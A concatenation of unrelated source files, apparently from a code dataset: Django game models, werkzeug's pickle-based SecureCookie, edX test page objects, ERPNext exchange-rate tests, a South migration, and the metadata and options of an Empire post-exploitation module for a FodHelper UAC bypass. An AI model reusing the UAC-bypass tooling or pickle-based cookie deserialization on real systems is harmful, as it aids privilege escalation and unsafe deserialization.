        return u"PC : %s %s" % (self.first_name, self.last_name)


@python_2_unicode_compatible
class NPCharacter(Character):
    """A non-player character."""

    def __str__(self):
        return u"NPC : %s %s" % (self.first_name, self.last_name)


class PlaceManager(models.Manager):
    """Manager enabling natural-key deserialization of Place fixtures."""

    def get_by_natural_key(self, short_name):
        return self.get(short_name=short_name)


@python_2_unicode_compatible
class Place(models.Model):
    """A location in which scenes take place."""
    objects = PlaceManager()

    begin_sound = models.CharField(_("Begin's Sound"), max_length=200, blank=True, null=True)
    ambiance_sound = models.CharField(_("Ambiance's Sound"), max_length=200, blank=True, null=True)
    short_name = models.CharField(_("Place's short Name"), max_length=20, unique=True)
    name = models.CharField("Scene's Name", max_length=200)
    filename = models.CharField("Scene's Filename", max_length=80)
    text = models.TextField("Scene's Text")

    def __str__(self):
        return self.name

    def natural_key(self):
        return self.short_name,


@python_2_unicode_compatible
class Scene(models.Model):
    """One scene of the story, optionally tied to a Place."""
    short_name = models.CharField(_("Scene's short Name"), max_length=20, unique=True)
    name = models.CharField("Scene's Name", max_length=200)
    filename = models.CharField("Scene's Filename", max_length=80)
    begin_sound = models.CharField(_("Begin's Sound"), max_length=200, blank=True, null=True)
    ambiance_sound = models.CharField(_("Ambiance's Sound"), max_length=200, blank=True, null=True)
    synopsis = models.TextField("Scene's synopsis, only for authors")
    final = models.BooleanField("Final Round ?", default=False)
    place = models.ForeignKey(Place, verbose_name="Scene's Place", blank=True, null=True)
    is_active = models.BooleanField(_("Is active ?"), default=True)
    order = models.PositiveIntegerField(_("Scene's Order"), default=0)
    need_a_trigger = models.BooleanField(_("Activable only by a trigger"), default=False)

    def __str__(self):
        return self.name


@python_2_unicode_compatible
class PartScene(models.Model):
    """A fragment of a Scene, optionally restricted to a single player."""
    text = models.CharField("Scene's Text", max_length=400)
    for_scene = models.ForeignKey(Scene, verbose_name="Scene")
    limited_to_player = models.ForeignKey(PlayerCharacter, blank=True, null=True)
    parent = models.ForeignKey('self', blank=True, null=True)
    active = models.BooleanField(default=True)

    def __str__(self):
        return "Text %s |for scene :%s" % (self.text, self.for_scene)


@python_2_unicode_compatible
class Choice1PartSceneto1Scene(models.Model):
    """A choice shown on a PartScene, leading to a Scene or to another PartScene."""
    text = models.CharField("Choice's Text", max_length=400)
    for_part_scene = models.ForeignKey(PartScene, verbose_name="Current Part Scene",
                                       related_name="current_choices_set")
    next_scene = models.ForeignKey(Scene, verbose_name="Next Scene",
                                   related_name="leading_choices_set",
                                   null=True, blank=True)
    next_part_scene = models.ForeignKey(PartScene, verbose_name="Next Part Scene",
                                        related_name="leading_choices_set",
                                        null=True, blank=True)

    def __str__(self):
        return "%s |for scene %s , part scene id :%s" % (
            self.text, self.for_part_scene.for_scene, self.for_part_scene.id)


@python_2_unicode_compatible
class Quest(models.Model):
    """A quest handed out by an NPC inside a Scene."""
    short_name = models.CharField(_("Quest's short Name"), max_length=20, unique=True)
    title = models.CharField("Quest's Title", max_length=140)
    text = models.TextField("Quest's Text")
    time_frame = models.PositiveIntegerField(_("Maximum Time (in minutes) for validate the Quest"), default=0)
    given_by = models.ForeignKey(NPCharacter, verbose_name=_('Given by'))
    scene = models.ForeignKey(Scene, verbose_name=_("Scene who Quest is activable"),
                              related_name=_("quests_for_scene"))
    scene_after = models.ForeignKey(Scene, verbose_name=_("Scene after the End's Quest"),
                                    related_name=_("finished_quests_for_scene"))
    apparition_function = models.CharField(_("Name of Apparition's Function"),
                                           max_length=120, blank=True, null=True)
    validation_function = models.CharField(_("Name of Validation's Function"), max_length=120)

    def __str__(self):
        # BUG FIX: the original formatted ``self.timedelta``, which is not a
        # field or attribute of this model (it would raise AttributeError at
        # runtime); the duration field is ``time_frame``.
        return "%s | for scene :%s, by NPC %s in time %s" % (
            self.title, self.scene, self.given_by, self.time_frame)


class ObjectType(models.Model):
    # Category of game objects (keys, weapons, ...).
    name = models.CharField(u"Type Object Name", max_length=200)
    description = models.TextField("Type's Description", blank=True, null=True)
    short_name = models.CharField(_("Type Object's short Name"), max_length=20, unique=True)


class OneObject(models.Model):
    # A concrete object instance, tracking its initial and current location.
    name = models.CharField(_("Type Object Name"), max_length=200)
    type = models.ForeignKey(ObjectType, verbose_name=_("Object's Type"))
    description = models.TextField("Object's Description", blank=True, null=True)
    initial_place = models.ForeignKey(Place, verbose_name=_("Object's Initial place"),
                                      related_name=_("initial_objects_set"),
                                      blank=True, null=True)
    stored_in = models.ForeignKey(Place, related_name=_("objects_stored_set"),
                                  verbose_name=_("Where the object is stored"),
                                  blank=True, null=True)
mit
Evilsmevil/Tinderbox
lib/werkzeug/contrib/securecookie.py
318
12204
# -*- coding: utf-8 -*-
r"""
    werkzeug.contrib.securecookie
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This module implements a cookie that is not alterable from the client
    because it adds a checksum the server checks for.  You can use it as
    session replacement if all you have is a user id or something to mark
    a logged in user.

    Keep in mind that the data is still readable from the client as a
    normal cookie is.  However you don't have to store and flush the
    sessions you have at the server.

    Example usage:

        >>> from werkzeug.contrib.securecookie import SecureCookie
        >>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")

    Dumping into a string so that one can store it in a cookie:

        >>> value = x.serialize()

    Loading from that string again:

        >>> x = SecureCookie.unserialize(value, "deadbeef")
        >>> x["baz"]
        (1, 2, 3)

    If someone modifies the cookie and the checksum is wrong the unserialize
    method will fail silently and return a new empty `SecureCookie` object.

    Keep in mind that the values will be visible in the cookie so do not
    store data in a cookie you don't want the user to see.

    Application Integration
    =======================

    If you are using the werkzeug request objects you could integrate the
    secure cookie into your application like this::

        from werkzeug.utils import cached_property
        from werkzeug.wrappers import BaseRequest
        from werkzeug.contrib.securecookie import SecureCookie

        # don't use this key but a different one; you could just use
        # os.urandom(20) to get something random
        SECRET_KEY = '\xfa\xdd\xb8z\xae\xe0}4\x8b\xea'

        class Request(BaseRequest):

            @cached_property
            def client_session(self):
                data = self.cookies.get('session_data')
                if not data:
                    return SecureCookie(secret_key=SECRET_KEY)
                return SecureCookie.unserialize(data, SECRET_KEY)

        def application(environ, start_response):
            request = Request(environ, start_response)

            # get a response object here
            response = ...

            if request.client_session.should_save:
                session_data = request.client_session.serialize()
                response.set_cookie('session_data', session_data,
                                    httponly=True)
            return response(environ, start_response)

    A less verbose integration can be achieved by using shorthand methods::

        class Request(BaseRequest):

            @cached_property
            def client_session(self):
                return SecureCookie.load_cookie(self, secret_key=COOKIE_SECRET)

        def application(environ, start_response):
            request = Request(environ, start_response)

            # get a response object here
            response = ...
            request.client_session.save_cookie(response)
            return response(environ, start_response)

    :copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
    :license: BSD, see LICENSE for more details.
"""
import pickle
import base64
from hmac import new as hmac
from time import time
from hashlib import sha1 as _default_hash

from werkzeug._compat import iteritems, text_type
from werkzeug.urls import url_quote_plus, url_unquote_plus
from werkzeug._internal import _date_to_unix
from werkzeug.contrib.sessions import ModificationTrackingDict
from werkzeug.security import safe_str_cmp
from werkzeug._compat import to_native


class UnquoteError(Exception):
    """Internal exception used to signal failures on quoting."""


class SecureCookie(ModificationTrackingDict):
    """Represents a secure cookie.  You can subclass this class and provide
    an alternative mac method.  The import thing is that the mac method
    is a function with a similar interface to the hashlib.  Required
    methods are update() and digest().

    Example usage:

    >>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")
    >>> x["foo"]
    42
    >>> x["baz"]
    (1, 2, 3)
    >>> x["blafasel"] = 23
    >>> x.should_save
    True

    :param data: the initial data.  Either a dict, list of tuples or `None`.
    :param secret_key: the secret key.  If not set `None` or not specified
                       it has to be set before :meth:`serialize` is called.
    :param new: The initial value of the `new` flag.
    """

    #: The hash method to use.  This has to be a module with a new function
    #: or a function that creates a hashlib object.  Such as `hashlib.md5`
    #: Subclasses can override this attribute.  The default hash is sha1.
    #: Make sure to wrap this in staticmethod() if you store an arbitrary
    #: function there such as hashlib.sha1 which  might be implemented
    #: as a function.
    hash_method = staticmethod(_default_hash)

    #: the module used for serialization.  Unless overriden by subclasses
    #: the standard pickle module is used.
    serialization_method = pickle

    #: if the contents should be base64 quoted.  This can be disabled if the
    #: serialization process returns cookie safe strings only.
    quote_base64 = True

    def __init__(self, data=None, secret_key=None, new=True):
        ModificationTrackingDict.__init__(self, data or ())
        # explicitly convert it into a bytestring because python 2.6
        # no longer performs an implicit string conversion on hmac
        # NOTE(review): on Python 3 ``bytes(str)`` without an encoding raises
        # TypeError, so callers appear expected to pass bytes here — confirm.
        if secret_key is not None:
            secret_key = bytes(secret_key)
        self.secret_key = secret_key
        self.new = new

    def __repr__(self):
        # Trailing '*' marks a modified (unsaved) cookie.
        return '<%s %s%s>' % (
            self.__class__.__name__,
            dict.__repr__(self),
            self.should_save and '*' or ''
        )

    @property
    def should_save(self):
        """True if the session should be saved.  By default this is only true
        for :attr:`modified` cookies, not :attr:`new`.
        """
        return self.modified

    @classmethod
    def quote(cls, value):
        """Quote the value for the cookie.  This can be any object supported
        by :attr:`serialization_method`.

        :param value: the value to quote.
        """
        if cls.serialization_method is not None:
            value = cls.serialization_method.dumps(value)
        if cls.quote_base64:
            # splitlines()/join strips the newlines some b64 encoders insert
            value = b''.join(base64.b64encode(value).splitlines()).strip()
        return value

    @classmethod
    def unquote(cls, value):
        """Unquote the value for the cookie.  If unquoting does not work a
        :exc:`UnquoteError` is raised.

        :param value: the value to unquote.
        """
        try:
            if cls.quote_base64:
                value = base64.b64decode(value)
            if cls.serialization_method is not None:
                value = cls.serialization_method.loads(value)
            return value
        except Exception:
            # unfortunately pickle and other serialization modules can
            # cause pretty every error here.  if we get one we catch it
            # and convert it into an UnquoteError
            raise UnquoteError()

    def serialize(self, expires=None):
        """Serialize the secure cookie into a string.

        If expires is provided, the session will be automatically invalidated
        after expiration when you unseralize it. This provides better
        protection against session cookie theft.

        :param expires: an optional expiration date for the cookie (a
                        :class:`datetime.datetime` object)
        """
        if self.secret_key is None:
            raise RuntimeError('no secret key defined')
        if expires:
            # stored as a plain item so it round-trips through unserialize()
            self['_expires'] = _date_to_unix(expires)
        result = []
        mac = hmac(self.secret_key, None, self.hash_method)
        # sorted() makes the MAC input order-independent of dict iteration
        for key, value in sorted(self.items()):
            result.append(('%s=%s' % (
                url_quote_plus(key),
                self.quote(value).decode('ascii')
            )).encode('ascii'))
            mac.update(b'|' + result[-1])
        # layout: base64(mac) '?' 'k1=v1&k2=v2&...'
        return b'?'.join([
            base64.b64encode(mac.digest()).strip(),
            b'&'.join(result)
        ])

    @classmethod
    def unserialize(cls, string, secret_key):
        """Load the secure cookie from a serialized string.

        :param string: the cookie value to unserialize.
        :param secret_key: the secret key used to serialize the cookie.
        :return: a new :class:`SecureCookie`.
        """
        if isinstance(string, text_type):
            string = string.encode('utf-8', 'replace')
        if isinstance(secret_key, text_type):
            secret_key = secret_key.encode('utf-8', 'replace')
        try:
            base64_hash, data = string.split(b'?', 1)
        except (ValueError, IndexError):
            items = ()
        else:
            items = {}
            mac = hmac(secret_key, None, cls.hash_method)
            # recompute the MAC over the raw pairs before unquoting anything
            for item in data.split(b'&'):
                mac.update(b'|' + item)
                if not b'=' in item:
                    items = None
                    break
                key, value = item.split(b'=', 1)
                # try to make the key a string
                key = url_unquote_plus(key.decode('ascii'))
                try:
                    key = to_native(key)
                except UnicodeError:
                    pass
                items[key] = value

            # no parsing error and the mac looks okay, we can now
            # sercurely unpickle our cookie.
            try:
                client_hash = base64.b64decode(base64_hash)
            except TypeError:
                items = client_hash = None
            # safe_str_cmp avoids leaking the MAC via timing differences
            if items is not None and safe_str_cmp(client_hash, mac.digest()):
                try:
                    for key, value in iteritems(items):
                        items[key] = cls.unquote(value)
                except UnquoteError:
                    items = ()
                else:
                    if '_expires' in items:
                        if time() > items['_expires']:
                            # expired cookies fail silently: empty session
                            items = ()
                        else:
                            del items['_expires']
            else:
                items = ()
        return cls(items, secret_key, False)

    @classmethod
    def load_cookie(cls, request, key='session', secret_key=None):
        """Loads a :class:`SecureCookie` from a cookie in request.  If the
        cookie is not set, a new :class:`SecureCookie` instanced is
        returned.

        :param request: a request object that has a `cookies` attribute
                        which is a dict of all cookie values.
        :param key: the name of the cookie.
        :param secret_key: the secret key used to unquote the cookie.
                           Always provide the value even though it has
                           no default!
        """
        data = request.cookies.get(key)
        if not data:
            return cls(secret_key=secret_key)
        return cls.unserialize(data, secret_key)

    def save_cookie(self, response, key='session', expires=None,
                    session_expires=None, max_age=None, path='/', domain=None,
                    secure=None, httponly=False, force=False):
        """Saves the SecureCookie in a cookie on response object.  All
        parameters that are not described here are forwarded directly
        to :meth:`~BaseResponse.set_cookie`.

        :param response: a response object that has a
                         :meth:`~BaseResponse.set_cookie` method.
        :param key: the name of the cookie.
        :param session_expires: the expiration date of the secure cookie
                                stored information.  If this is not provided
                                the cookie `expires` date is used instead.
        """
        if force or self.should_save:
            data = self.serialize(session_expires or expires)
            response.set_cookie(key, data, expires=expires, max_age=max_age,
                                path=path, domain=domain, secure=secure,
                                httponly=httponly)
apache-2.0
synergeticsedx/deployment-wipro
common/test/acceptance/pages/lms/login_and_register.py
8
13114
"""Login and Registration pages """ from urllib import urlencode from bok_choy.page_object import PageObject, unguarded from bok_choy.promise import Promise, EmptyPromise from common.test.acceptance.pages.lms import BASE_URL from common.test.acceptance.pages.lms.dashboard import DashboardPage class RegisterPage(PageObject): """ Registration page (create a new account) """ def __init__(self, browser, course_id): """ Course ID is currently of the form "edx/999/2013_Spring" but this format could change. """ super(RegisterPage, self).__init__(browser) self._course_id = course_id @property def url(self): """ URL for the registration page of a course. """ return "{base}/register?course_id={course_id}&enrollment_action={action}".format( base=BASE_URL, course_id=self._course_id, action="enroll", ) def is_browser_on_page(self): return any([ 'register' in title.lower() for title in self.q(css='span.title-sub').text ]) def provide_info(self, email, password, username, full_name): """ Fill in registration info. `email`, `password`, `username`, and `full_name` are the user's credentials. """ self.wait_for_element_visibility('input#email', 'Email field is shown') self.q(css='input#email').fill(email) self.q(css='input#password').fill(password) self.q(css='input#username').fill(username) self.q(css='input#name').fill(full_name) self.q(css='input#tos-yes').first.click() self.q(css='input#honorcode-yes').first.click() self.q(css="#country option[value='US']").first.click() def submit(self): """ Submit registration info to create an account. """ self.q(css='button#submit').first.click() # The next page is the dashboard; make sure it loads dashboard = DashboardPage(self.browser) dashboard.wait_for_page() return dashboard class ResetPasswordPage(PageObject): """Initialize the page. Arguments: browser (Browser): The browser instance. 
""" url = BASE_URL + "/login#forgot-password-modal" def __init__(self, browser): super(ResetPasswordPage, self).__init__(browser) def is_browser_on_page(self): return ( self.q(css="#login-anchor").is_present() and self.q(css="#password-reset-anchor").is_present() ) def is_form_visible(self): return ( not self.q(css="#login-anchor").visible and self.q(css="#password-reset-form").visible ) def fill_password_reset_form(self, email): """ Fill in the form and submit it """ self.wait_for_element_visibility('#password-reset-email', 'Reset Email field is shown') self.q(css="#password-reset-email").fill(email) self.q(css="button.js-reset").click() def is_success_visible(self, selector): """ Check element is visible """ self.wait_for_element_visibility(selector, 'Success div is shown') def get_success_message(self): """ Return a success message displayed to the user """ return self.q(css=".submission-success h4").text class CombinedLoginAndRegisterPage(PageObject): """Interact with combined login and registration page. This page is currently hidden behind the feature flag `ENABLE_COMBINED_LOGIN_REGISTRATION`, which is enabled in the bok choy settings. When enabled, the new page is available from either `/login` or `/register`; the new page is also served at `/account/login/` or `/account/register/`, where it was available for a time during an A/B test. Users can reach this page while attempting to enroll in a course, in which case users will be auto-enrolled when they successfully authenticate (unless the course has been paywalled). """ def __init__(self, browser, start_page="register", course_id=None): """Initialize the page. Arguments: browser (Browser): The browser instance. Keyword Args: start_page (str): Whether to start on the login or register page. course_id (unicode): If provided, load the page as if the user is trying to enroll in a course. 
""" super(CombinedLoginAndRegisterPage, self).__init__(browser) self._course_id = course_id if start_page not in ["register", "login"]: raise ValueError("Start page must be either 'register' or 'login'") self._start_page = start_page @property def url(self): """Return the URL for the combined login/registration page. """ url = "{base}/{login_or_register}".format( base=BASE_URL, login_or_register=self._start_page ) # These are the parameters that would be included if the user # were trying to enroll in a course. if self._course_id is not None: url += "?{params}".format( params=urlencode({ "course_id": self._course_id, "enrollment_action": "enroll" }) ) return url def is_browser_on_page(self): """Check whether the combined login/registration page has loaded. """ return ( self.q(css="#login-anchor").is_present() and self.q(css="#register-anchor").is_present() and self.current_form is not None ) def toggle_form(self): """Toggle between the login and registration forms. """ old_form = self.current_form # Toggle the form if old_form == "login": self.q(css=".form-toggle[data-type='register']").click() else: self.q(css=".form-toggle[data-type='login']").click() # Wait for the form to change before returning EmptyPromise( lambda: self.current_form != old_form, "Finish toggling to the other form" ).fulfill() def register( self, email="", password="", username="", full_name="", country="", favorite_movie="", terms_of_service=False ): """Fills in and submits the registration form. Requires that the "register" form is visible. This does NOT wait for the next page to load, so the caller should wait for the next page (or errors if that's the expected behavior.) Keyword Arguments: email (unicode): The user's email address. password (unicode): The user's password. username (unicode): The user's username. full_name (unicode): The user's full name. country (unicode): Two-character country code. terms_of_service (boolean): If True, agree to the terms of service and honor code. 
""" # Fill in the form self.wait_for_element_visibility('#register-email', 'Email field is shown') if email: self.q(css="#register-email").fill(email) if full_name: self.q(css="#register-name").fill(full_name) if username: self.q(css="#register-username").fill(username) if password: self.q(css="#register-password").fill(password) if country: self.q(css="#register-country option[value='{country}']".format(country=country)).click() if favorite_movie: self.q(css="#register-favorite_movie").fill(favorite_movie) if terms_of_service: self.q(css="#register-honor_code").click() # Submit it self.q(css=".register-button").click() def login(self, email="", password=""): """Fills in and submits the login form. Requires that the "login" form is visible. This does NOT wait for the next page to load, so the caller should wait for the next page (or errors if that's the expected behavior). Keyword Arguments: email (unicode): The user's email address. password (unicode): The user's password. """ # Fill in the form self.wait_for_element_visibility('#login-email', 'Email field is shown') self.q(css="#login-email").fill(email) self.q(css="#login-password").fill(password) # Submit it self.q(css=".login-button").click() def click_third_party_dummy_provider(self): """Clicks on the Dummy third party provider login button. Requires that the "login" form is visible. This does NOT wait for the ensuing page[s] to load. Only the "Dummy" provider is used for bok choy because it is the only one that doesn't send traffic to external servers. """ self.q(css="button.{}-oa2-dummy".format(self.current_form)).click() def password_reset(self, email): """Navigates to, fills in, and submits the password reset form. Requires that the "login" form is visible. Keyword Arguments: email (unicode): The user's email address. 
""" login_form = self.current_form # Click the password reset link on the login page self.q(css=".forgot-password").click() # Wait for the password reset form to load EmptyPromise( lambda: self.current_form != login_form, "Finish toggling to the password reset form" ).fulfill() # Fill in the form self.wait_for_element_visibility('#password-reset-email', 'Email field is shown') self.q(css="#password-reset-email").fill(email) # Submit it self.q(css="button.js-reset").click() return CombinedLoginAndRegisterPage(self.browser).wait_for_page() @property @unguarded def current_form(self): """Return the form that is currently visible to the user. Returns: Either "register", "login", or "password-reset" if a valid form is loaded. If we can't find any of these forms on the page, return None. """ if self.q(css=".register-button").visible: return "register" elif self.q(css=".login-button").visible: return "login" elif self.q(css=".js-reset").visible: return "password-reset" elif self.q(css=".proceed-button").visible: return "hinted-login" @property def email_value(self): """ Current value of the email form field """ return self.q(css="#register-email").attrs('value')[0] @property def full_name_value(self): """ Current value of the full_name form field """ return self.q(css="#register-name").attrs('value')[0] @property def username_value(self): """ Current value of the username form field """ return self.q(css="#register-username").attrs('value')[0] @property def errors(self): """Return a list of errors displayed to the user. """ return self.q(css=".submission-error li").text def wait_for_errors(self): """Wait for errors to be visible, then return them. 
""" def _check_func(): """Return success status and any errors that occurred.""" errors = self.errors return (bool(errors), errors) return Promise(_check_func, "Errors are visible").fulfill() @property def success(self): """Return a success message displayed to the user.""" if self.q(css=".submission-success").visible: return self.q(css=".submission-success h4").text def wait_for_success(self): """Wait for a success message to be visible, then return it.""" def _check_func(): """Return success status and any errors that occurred.""" success = self.success return (bool(success), success) return Promise(_check_func, "Success message is visible").fulfill() @unguarded # Because we go from this page -> temporary page -> this page again when testing the Dummy provider def wait_for_auth_status_message(self): """Wait for a status message to be visible following third_party registration, then return it.""" def _check_func(): """Return third party auth status notice message.""" selector = '.js-auth-warning p' msg_element = self.q(css=selector) if msg_element.visible: return (True, msg_element.text[0]) return (False, None) return Promise(_check_func, "Result of third party auth is visible").fulfill() @property def hinted_login_prompt(self): """Get the message displayed to the user on the hinted-login form""" if self.q(css=".wrapper-other-login .instructions").visible: return self.q(css=".wrapper-other-login .instructions").text[0]
agpl-3.0
rohitwaghchaure/erpnext_develop
erpnext/setup/doctype/currency_exchange/test_currency_exchange.py
12
3584
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt

from __future__ import unicode_literals

import frappe, unittest
from erpnext.setup.utils import get_exchange_rate

test_records = frappe.get_test_records('Currency Exchange')


def save_new_records(test_records):
    """Upsert the test exchange-rate fixtures: try a direct field update
    first and fall back to creating the document when it does not exist."""
    for record in test_records:
        # Currency Exchange docnames follow the "date-from-to" pattern.
        kwargs = dict(
            doctype=record.get("doctype"),
            docname=record.get("date") + '-' + record.get("from_currency") + '-' + record.get("to_currency"),
            fieldname="exchange_rate",
            value=record.get("exchange_rate"),
        )

        try:
            frappe.set_value(**kwargs)
        except frappe.DoesNotExistError:
            curr_exchange = frappe.new_doc(record.get("doctype"))
            curr_exchange.date = record["date"]
            curr_exchange.from_currency = record["from_currency"]
            curr_exchange.to_currency = record["to_currency"]
            curr_exchange.exchange_rate = record["exchange_rate"]
            curr_exchange.insert()


class TestCurrencyExchange(unittest.TestCase):
    """Tests get_exchange_rate() with stale rates allowed and disallowed."""

    def clear_cache(self):
        # get_exchange_rate caches per currency pair; drop the USD->INR entry
        # so the next call hits the database / remote service again.
        cache = frappe.cache()
        key = "currency_exchange_rate:{0}:{1}".format("USD", "INR")
        cache.delete(key)

    def tearDown(self):
        # Restore the default "allow stale rates" setting for other tests.
        frappe.db.set_value("Accounts Settings", None, "allow_stale", 1)
        self.clear_cache()

    def test_exchange_rate(self):
        save_new_records(test_records)
        frappe.db.set_value("Accounts Settings", None, "allow_stale", 1)

        # Start with allow_stale is True
        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-01")
        self.assertEqual(exchange_rate, 60.0)

        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15")
        self.assertEqual(exchange_rate, 65.1)

        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-30")
        self.assertEqual(exchange_rate, 62.9)

        # Exchange rate as on 15th Dec, 2015, should be fetched from fixer.io
        self.clear_cache()
        exchange_rate = get_exchange_rate("USD", "INR", "2015-12-15")
        self.assertFalse(exchange_rate == 60)
        self.assertEqual(exchange_rate, 66.894)

    def test_exchange_rate_strict(self):
        # strict currency settings: stale rates older than 1 day are rejected
        frappe.db.set_value("Accounts Settings", None, "allow_stale", 0)
        frappe.db.set_value("Accounts Settings", None, "stale_days", 1)

        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-01")
        self.assertEqual(exchange_rate, 60.0)

        # Will fetch from fixer.io
        self.clear_cache()
        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15")
        self.assertEqual(exchange_rate, 67.79)

        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-30")
        self.assertEqual(exchange_rate, 62.9)

        # Exchange rate as on 15th Dec, 2015, should be fetched from fixer.io
        self.clear_cache()
        exchange_rate = get_exchange_rate("USD", "INR", "2015-12-15")
        self.assertEqual(exchange_rate, 66.894)

        exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-10")
        self.assertEqual(exchange_rate, 65.1)

        # NGN is not available on fixer.io so these should return 0
        exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-09")
        self.assertEqual(exchange_rate, 0)

        exchange_rate = get_exchange_rate("INR", "NGN", "2016-01-11")
        self.assertEqual(exchange_rate, 0)

    def test_exchange_rate_strict_switched(self):
        # Start with allow_stale is True
        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15")
        self.assertEqual(exchange_rate, 65.1)

        # Flip to strict mid-test to verify the cached value is not reused.
        frappe.db.set_value("Accounts Settings", None, "allow_stale", 0)
        frappe.db.set_value("Accounts Settings", None, "stale_days", 1)

        # Will fetch from fixer.io
        self.clear_cache()
        exchange_rate = get_exchange_rate("USD", "INR", "2016-01-15")
        self.assertEqual(exchange_rate, 67.79)
gpl-3.0
s1n4/django-categories
categories/migrations/0011_move_category_fks.py
14
3989
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models

class Migration(DataMigration):
    """Data migration copying CategoryRelation.story into the new
    ``category`` FK (and back again on rollback).  The frozen ``models``
    dict below is a South snapshot and must not be edited."""

    def forwards(self, orm):
        "Write your forwards methods here."
        # Populate the new `category` column from the legacy `story` FK.
        orm.CategoryRelation.objects.update(category=models.F('story'))

    def backwards(self, orm):
        "Write your backwards methods here."
        # Restore the legacy `story` column from `category`.
        orm.CategoryRelation.objects.update(story=models.F('category'))

    models = {
        'categories.category': {
            'Meta': {'ordering': "('tree_id', 'lft')", 'unique_together': "(('parent', 'name'),)", 'object_name': 'Category'},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'alternate_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'alternate_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'meta_extra': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
            'meta_keywords': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['categories.Category']"}),
            'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'thumbnail': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'thumbnail_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'thumbnail_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
        },
        'categories.categoryrelation': {
            'Meta': {'object_name': 'CategoryRelation'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'new_cats'", 'null': 'True', 'to': "orm['categories.Category']"}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
            'relation_type': ('django.db.models.fields.CharField', [], {'max_length': "'200'", 'null': 'True', 'blank': 'True'}),
            'story': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']"})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['categories']
apache-2.0
byt3bl33d3r/Empire
lib/modules/powershell/privesc/bypassuac_fodhelper.py
12
4031
from lib.common import helpers class Module: def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'Invoke-FodHelperBypass', 'Author': ['Petr Medonos'], 'Description': ("Bypasses UAC by performing an registry modification for FodHelper (based on" "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/)"), 'Background' : True, 'OutputExtension' : None, 'NeedsAdmin' : False, 'OpsecSafe' : False, 'Language' : 'powershell', 'MinLanguageVersion' : '2', 'Comments': [ 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent' : { 'Description' : 'Agent to run module on.', 'Required' : True, 'Value' : '' }, 'Listener' : { 'Description' : 'Listener to use.', 'Required' : True, 'Value' : '' }, 'UserAgent' : { 'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'Proxy' : { 'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' }, 'ProxyCreds' : { 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. 
